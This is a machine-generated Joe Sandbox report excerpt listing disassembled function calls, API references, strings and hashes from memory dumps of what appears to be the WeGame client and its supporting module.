                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@H_prolog3Lockit@std@@U?$char_traits@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@GetfacetInit@?$basic_streambuf@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 3501216582-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD3A5C3
                                                                • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(00000008,?,?,00000008,6BD44945,00000008,?,?,00000000), ref: 6BD3A5D9
                                                                  • Part of subcall function 6BD38985: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXXZ.MSVCP140(?,?,00000000,?,?,6BD3641C,00000008,00000000), ref: 6BD3899D
                                                                  • Part of subcall function 6BD38985: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,?,00000000,?,?,6BD3641C,00000008,00000000), ref: 6BD389C0
                                                                • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(0000000F,00000000,00000001,?,?,?), ref: 6BD3A5F5
                                                                  • Part of subcall function 6BD34C73: __EH_prolog3.LIBCMT ref: 6BD34C7A
                                                                  • Part of subcall function 6BD34C73: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,6BD3A605,00000000,?,?,?), ref: 6BD34C85
                                                                  • Part of subcall function 6BD34C73: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?), ref: 6BD34C9C
                                                                  • Part of subcall function 6BD34C73: std::locale::_Getfacet.LIBCPMT ref: 6BD34CA6
                                                                  • Part of subcall function 6BD34C73: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,00000008,00000000,?,?,?), ref: 6BD34CBF
                                                                  • Part of subcall function 6BD34C73: std::_Facet_Register.LIBCPMT ref: 6BD34CD7
                                                                  • Part of subcall function 6BD34C73: ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,?,?), ref: 6BD34CFA
                                                                  • Part of subcall function 6BD38A01: ?always_noconv@codecvt_base@std@@QBE_NXZ.MSVCP140(?,?,?,6BD3A60E,00000000,?,?,?), ref: 6BD38A0D
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@@std@@H_prolog3Lockit@std@@U?$char_traits@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@GetfacetInit@?$basic_streambuf@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 3501216582-0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD95269
                                                                • ??0Qos@qos@adapt_for_imports@ierd_tgp@@QAE@XZ.COMMON(00000000,6BD56BC6,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD952B2
                                                                • __Init_thread_footer.LIBCMT ref: 6BD952C6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3Init_thread_footerQos@qos@adapt_for_imports@ierd_tgp@@
                                                                • String ID:
                                                                • API String ID: 3158337806-0
                                                                • Opcode ID: fcb9e76df0eaacaa52274898a0354568d3a416883a421b37102b961d3f764646
                                                                • Instruction ID: f74bef89a3444b3faebcc10badfa02525fcccdd6a8b8d66c0e71c20c0e5e7359
                                                                • Opcode Fuzzy Hash: fcb9e76df0eaacaa52274898a0354568d3a416883a421b37102b961d3f764646
                                                                • Instruction Fuzzy Hash: 68F0B431A045108FEB15EB789546B2C3361BB02739F35115CD2215F2D0CF3D5902AA52
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmp
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID: vF
                                                                • API String ID: 2427045233-49000009
                                                                • Opcode ID: 19d0a513e890d1298bb3f9cd22b1c4cf47e648bacaeee32eadc12912e2791a36
                                                                • Instruction ID: cbd9f979754a8c3311bbb19cc064fb6db02c9b56d71ae4bdf38ad7607f4c9579
                                                                • Opcode Fuzzy Hash: 19d0a513e890d1298bb3f9cd22b1c4cf47e648bacaeee32eadc12912e2791a36
                                                                • Instruction Fuzzy Hash: FF418331700204DBCF24DF54CA91CAE77B2EF89711F24402FD901BB692D7B4A989CBA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD9669A
                                                                  • Part of subcall function 6BD2A76F: __EH_prolog3_GS.LIBCMT ref: 6BD2A776
                                                                  • Part of subcall function 6BD2F706: __EH_prolog3_GS.LIBCMT ref: 6BD2F70D
                                                                  • Part of subcall function 6BD981C2: memset.VCRUNTIME140(00000002,00000000,00000080,?,?,?,6BD98138,?,?,0000002C,6BD95437,6BD577C5,00000000,00000001,00000002,0000007C), ref: 6BD981D7
                                                                  • Part of subcall function 6BD981C2: memmove.VCRUNTIME140(00000002,00000000,00000080,00000002,00000000,?), ref: 6BD981F9
                                                                Strings
                                                                • %s#%d#%llu#%s#%llu#%s#%s#%llu, xrefs: 6BD966A1
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$memmovememset
                                                                • String ID: %s#%d#%llu#%s#%llu#%s#%s#%llu
                                                                • API String ID: 221172491-2678914559
                                                                • Opcode ID: 813008d92d41a55a0a0fe9e7304c70ec321a974167e5ac1003f0c534796f4f4c
                                                                • Instruction ID: 62954816e50003be10e0edbcaecc7ebb704f4a0ce0c40701f56cbabd5d927997
                                                                • Opcode Fuzzy Hash: 813008d92d41a55a0a0fe9e7304c70ec321a974167e5ac1003f0c534796f4f4c
                                                                • Instruction Fuzzy Hash: BD1100B2810645AADB18D7B0CC5AEEE736CEB14228F540A5CA2565B090FF7CBB05C774
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID: vF
                                                                • API String ID: 2427045233-49000009
                                                                • Opcode ID: 4f2cd4c0d0d9d157585a0e6310de1ab4c1c42d907215eca07693cfd48ff219e3
                                                                • Instruction ID: dc17b2759417b91f14c375007d5bca3b47606cbb3e4c912de54a07edec8761fb
                                                                • Opcode Fuzzy Hash: 4f2cd4c0d0d9d157585a0e6310de1ab4c1c42d907215eca07693cfd48ff219e3
                                                                • Instruction Fuzzy Hash: 69012970900248DFCB14DFAAC58159DBBB0BF08318F60416FE009EB292D7745A45CBA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD8F7A7
                                                                  • Part of subcall function 6BD8F960: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 6BD8F987
                                                                  • Part of subcall function 6BD8F960: RegQueryValueExA.KERNEL32(?,~MHz,00000000,00000000,?,00000004), ref: 6BD8F9A4
                                                                  • Part of subcall function 6BD8F960: RegCloseKey.KERNEL32(?), ref: 6BD8F9AF
                                                                  • Part of subcall function 6BE22DCC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6BD1621D,0000002C,0000000C,6BD15702,00000004,6BD157B1,00000214), ref: 6BE22DE1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CloseH_prolog3OpenQueryValuemalloc
                                                                • String ID: Root
                                                                • API String ID: 248731187-3066451557
                                                                • Opcode ID: 70b8130a594460319de6a2506c94a0d230c4bad692bf82c0889d09657f7d78af
                                                                • Instruction ID: 7e6f890d8260491e3fc0d7ab4cd9d84fb82d8275a99a0db7ea9b2d2dc68a7e86
                                                                • Opcode Fuzzy Hash: 70b8130a594460319de6a2506c94a0d230c4bad692bf82c0889d09657f7d78af
                                                                • Instruction Fuzzy Hash: FE0119B19007008BD7349F3A884150AFAF5BF90724B608A5FD0A69BAA0DBB8A600CB55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 6BD46FEA
                                                                  • Part of subcall function 6BD4A3E3: __EH_prolog3_catch_GS.LIBCMT ref: 6BD4A3ED
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3H_prolog3_catch_
                                                                • String ID: Pvy
                                                                • API String ID: 863784098-3275874378
                                                                • Opcode ID: f9a98154d519aa2af7ced052fa8ebd09f3d3c033ed3fa1d611cc4437cf17400b
                                                                • Instruction ID: 2657a42021d0fccdd770fd5c20cd2f1e836a0e510eab050cecf0de6f05b92bcd
                                                                • Opcode Fuzzy Hash: f9a98154d519aa2af7ced052fa8ebd09f3d3c033ed3fa1d611cc4437cf17400b
                                                                • Instruction Fuzzy Hash: B7E0ED31520209AFDF156FA8C9077EE3B62BF1036AF60425DF4111D1A1C77ACA35ABE2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00450FB0
                                                                  • Part of subcall function 00450F32: __EH_prolog3_GS.LIBCMT ref: 00450F39
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_
                                                                • String ID: vF
                                                                • API String ID: 2427045233-49000009
                                                                • Opcode ID: e0993cdc1a55339e91c04f4e3ae07f0e69bf0676f9064051b39cd4e1b36cd62d
                                                                • Instruction ID: 106f27b580e73408323526147192fc227aa2d0378545842578f3488132498658
                                                                • Opcode Fuzzy Hash: e0993cdc1a55339e91c04f4e3ae07f0e69bf0676f9064051b39cd4e1b36cd62d
                                                                • Instruction Fuzzy Hash: DAE04672A1020897CB24E6B6C426ADDBA609B20368F00812EF000A71D2EF7C9E0587AC
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,?), ref: 6BD0509A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID: 8
                                                                • API String ID: 2221118986-4194326291
                                                                • Opcode ID: 64a2beafb2644f1757d99032139ed5422b24e7856ca93a26028574c29d38b0cc
                                                                • Instruction ID: 1b036b9586328114ec739968ba95ed93d17dfc1d14743118cb855d3425a14f9d
                                                                • Opcode Fuzzy Hash: 64a2beafb2644f1757d99032139ed5422b24e7856ca93a26028574c29d38b0cc
                                                                • Instruction Fuzzy Hash: 2D9106B1600A02EBD714CF29D894792F7F1FF48328F14422AD5698BA90DB7AE464DFC1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6BE1623F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?), ref: 6BE162BF
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                • String ID:
                                                                • API String ID: 3668304517-0
                                                                • Opcode ID: 7c84c45e29b55ee5ff9d75568a4a411b6f1fd9a88502ed19921a5d6f2fc6a488
                                                                • Instruction ID: 5764102b2f250be67a3fb79ea35141b63999d4875da2d666b7019f35843529f9
                                                                • Opcode Fuzzy Hash: 7c84c45e29b55ee5ff9d75568a4a411b6f1fd9a88502ed19921a5d6f2fc6a488
                                                                • Instruction Fuzzy Hash: AD4104726041045FD718CF18D894BAABBFAEFC1354F34851DE84A8B390DB75E959C790
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2551C
                                                                • ?get_workingdir_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,00000058), ref: 6BD25540
                                                                  • Part of subcall function 6BD2755B: __EH_prolog3_GS.LIBCMT ref: 6BD27562
                                                                  • Part of subcall function 6BD2755B: ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,0000002C,6BD25545,?,00000058), ref: 6BD2759D
                                                                  • Part of subcall function 6BD2755B: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,?,0000002C,6BD25545,?,00000058), ref: 6BD275A7
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@$?current_path@filesystem@ierd_tgp@@?get_workingdir_path@?u16to8@common@ierd_tgp@@Application@common@ierd_tgp@@D@2@@4@@D@2@@std@@U?$char_traits@_V?$allocator@_V?$basic_string@_Verror_code@std@@@Vpath@12@W@2@@std@@W@std@@
                                                                • String ID:
                                                                • API String ID: 452369562-0
                                                                • Opcode ID: 2a4dd022787be578f27274e7fc0f81e3be5718905c9f71d4d8f8e174e2444427
                                                                • Instruction ID: bc9279691e42a03d8adb6f0c8e672f3051bd9e1c3a8377ab42ec77df1f97914a
                                                                • Opcode Fuzzy Hash: 2a4dd022787be578f27274e7fc0f81e3be5718905c9f71d4d8f8e174e2444427
                                                                • Instruction Fuzzy Hash: 6C415BB1801248EFCF04CFE4C981ADEBBB8BF14328F10425AE515AF295DB789B05CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00456856
                                                                  • Part of subcall function 00453291: __EH_prolog3.LIBCMT ref: 00453298
                                                                  • Part of subcall function 004567DF: __EH_prolog3.LIBCMT ref: 004567E6
                                                                  • Part of subcall function 004567DF: _CxxThrowException.VCRUNTIME140(?,0049C1AC,?,00000054,004568B0,00000000,?,?,00000030,00453EC0,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s,e:\dailybuild_dev\wegame_client\dependences\boost_1_67_0\boost\property_tree\detail\ptree_implementation.hpp,000002A0), ref: 00456811
                                                                • __EH_prolog3.LIBCMT ref: 004568B8
                                                                  • Part of subcall function 004532C0: __EH_prolog3.LIBCMT ref: 004532C7
                                                                  • Part of subcall function 00456817: __EH_prolog3.LIBCMT ref: 0045681E
                                                                  • Part of subcall function 00456817: _CxxThrowException.VCRUNTIME140(?,0049C288,?,00000054,?,0049C1AC,?,00000054,004568B0,00000000,?,?,00000030,00453EC0,00000000,int __thiscall boost::property_tree::basic_ptree<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class std::basic_s), ref: 00456849
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$ExceptionThrow
                                                                • String ID:
                                                                • API String ID: 2323905274-0
                                                                • Opcode ID: 82afe54a5b79e7a2911202749aca1eba2d75e57b651cdab68fcad4d550eb75a9
                                                                • Instruction ID: fd55ab33862aed6cc14af8e3b93c8d988df48b502f6cbe1ba34403de8e7cb969
                                                                • Opcode Fuzzy Hash: 82afe54a5b79e7a2911202749aca1eba2d75e57b651cdab68fcad4d550eb75a9
                                                                • Instruction Fuzzy Hash: 9D316671D0021AABCF11AFB2CC869AF7769EF04359F51441ABD14B7253EE38D91887A8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD38131
                                                                  • Part of subcall function 6BD382B3: __EH_prolog3_GS.LIBCMT ref: 6BD382BA
                                                                • memset.VCRUNTIME140(?,00000000,00000040,000000A0,6BD3A0D1,?,?,?), ref: 6BD38192
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(00000000,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A9BB
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_memmove$memset
                                                                • String ID:
                                                                • API String ID: 2853179963-0
                                                                • Opcode ID: 1350adcd92b9290733d70f35eaa44cb162f438e7bbc2a2917d903535449cc37f
                                                                • Instruction ID: c7e41781adb92d0d517d7b76b411fcf73cbcc15e58e110e42815fe8ec17c34db
                                                                • Opcode Fuzzy Hash: 1350adcd92b9290733d70f35eaa44cb162f438e7bbc2a2917d903535449cc37f
                                                                • Instruction Fuzzy Hash: 7821B476E00329AFDF24DBB0DC81FDEB3B8AB06314F4044AAE508EB151DB39A6448B51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD2E6A7
                                                                  • Part of subcall function 6BD2E537: __EH_prolog3.LIBCMT ref: 6BD2E53E
                                                                  • Part of subcall function 6BD1820A: __EH_prolog3.LIBCMT ref: 6BD18211
                                                                  • Part of subcall function 6BD1820A: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,6BD2EA59,00000000,?,000000C4,6BD2A828,00000000,00000008,00000009,00000003,00000024,6BDBA75E,create_directory_ex fail, error code:%1%, path:%2%), ref: 6BD1821C
                                                                  • Part of subcall function 6BD1820A: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD18233
                                                                  • Part of subcall function 6BD1820A: std::locale::_Getfacet.LIBCPMT ref: 6BD1823D
                                                                  • Part of subcall function 6BD1820A: ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,00000008,00000000), ref: 6BD18256
                                                                  • Part of subcall function 6BD1820A: std::_Facet_Register.LIBCPMT ref: 6BD1826E
                                                                  • Part of subcall function 6BD1820A: ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD18291
                                                                • ?widen@?$ctype@D@std@@QBEDD@Z.MSVCP140(00000020,?,00000088,6BD2EAB6,00000000), ref: 6BD2E6CA
                                                                  • Part of subcall function 6BD2B63B: __EH_prolog3.LIBCMT ref: 6BD2B642
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$D@std@@Lockit@std@@$??0_??1_?widen@?$ctype@Bid@locale@std@@Facet_Getcat@?$ctype@GetfacetH_prolog3_RegisterV42@@Vfacet@locale@2@std::_std::locale::_
                                                                • String ID:
                                                                • API String ID: 194000845-0
                                                                • Opcode ID: 425f58ab46e19ff3c5acd1b5cb77ef7fc4debdbb64d1cd87bc6871c2cf63f18e
                                                                • Instruction ID: 9e980474454f0f135740d7e99646487b9e9a8447dde9d52d14ee3966665828d6
                                                                • Opcode Fuzzy Hash: 425f58ab46e19ff3c5acd1b5cb77ef7fc4debdbb64d1cd87bc6871c2cf63f18e
                                                                • Instruction Fuzzy Hash: 01219C71900248DBDB24EB70CD96B9DBB75AF1036CF508198D25A9B1D0DF389F4ADB20
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDB5AF7
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@00AAV45@1@Z.COMMON(?,?,?), ref: 6BDB5B58
                                                                  • Part of subcall function 6BDB585A: __EH_prolog3_GS.LIBCMT ref: 6BDB5864
                                                                  • Part of subcall function 6BDB585A: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,000002DC), ref: 6BDB591E
                                                                  • Part of subcall function 6BDB585A: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,000002DC), ref: 6BDB5930
                                                                  • Part of subcall function 6BDB585A: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,000002DC), ref: 6BDB593D
                                                                  • Part of subcall function 6BDB585A: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,000002DC), ref: 6BDB594F
                                                                  • Part of subcall function 6BDB585A: memset.VCRUNTIME140(?,00000000,00000208,?,?,?,?,?,?,?,?,000002DC), ref: 6BDB5962
                                                                  • Part of subcall function 6BDB585A: GetPrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6BDB59CA
                                                                  • Part of subcall function 6BDB585A: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 6BDB59D4
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?u8to16@common@ierd_tgp@@D@2@@std@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@4@@W@std@@$H_prolog3_Private$?get_log_instance@base@@D@2@@std@@00Logger@1@ProfileProfile@ReadStringSys_wrapper@common@ierd_tgp@@V45@1@memmovememset
                                                                • String ID:
                                                                • API String ID: 1882573419-0
                                                                • Opcode ID: 9877a68aa891bc4da79ce766c5d6600173945e5eccaf0a0050ffd7b28f634fcd
                                                                • Instruction ID: 5960d1c10ff96b86210b5c1dc26ab5d8fc2f513f78bcc36f616f582a9ad108de
                                                                • Opcode Fuzzy Hash: 9877a68aa891bc4da79ce766c5d6600173945e5eccaf0a0050ffd7b28f634fcd
                                                                • Instruction Fuzzy Hash: D72119B1C04349DFCB14CFB8C8816EEBFB4AF19324F14416AD555AB281E7385A46CB60
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CountH_prolog3_Tick
                                                                • String ID:
                                                                • API String ID: 2349883465-0
                                                                • Opcode ID: ff3f8377b54597f99c260caa9a66178339edaea93a860e03b1eb3dde390a510c
                                                                • Instruction ID: 0575c8eae24c714bc311d02e09cda67f5442f49ab7f3c337a3ef283fcf01414c
                                                                • Opcode Fuzzy Hash: ff3f8377b54597f99c260caa9a66178339edaea93a860e03b1eb3dde390a510c
                                                                • Instruction Fuzzy Hash: BE219C309052A8EBDB16DBB4C455BDD7BB0AF13328F044089D4829F292DBBD9B49D762
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • Sleep.KERNEL32(00000064), ref: 6BD9B948
                                                                • select.WS2_32(00000100,?,?,?,?), ref: 6BD9B970
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Sleepselect
                                                                • String ID:
                                                                • API String ID: 3651608395-0
                                                                • Opcode ID: 72a074154a264ed16c2c722539272d9195c74f965bee8fbcc34bf9cdd9f1f484
                                                                • Instruction ID: 0f6e1b5df97d2151b47752c55e476a18c4c2e5f9dd352c395731c27146ed6346
                                                                • Opcode Fuzzy Hash: 72a074154a264ed16c2c722539272d9195c74f965bee8fbcc34bf9cdd9f1f484
                                                                • Instruction Fuzzy Hash: F1213372D1021CABDB5ADF64CC41BDA77BCAB19310F1042EEA51AE7180DA749B858FA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045899A
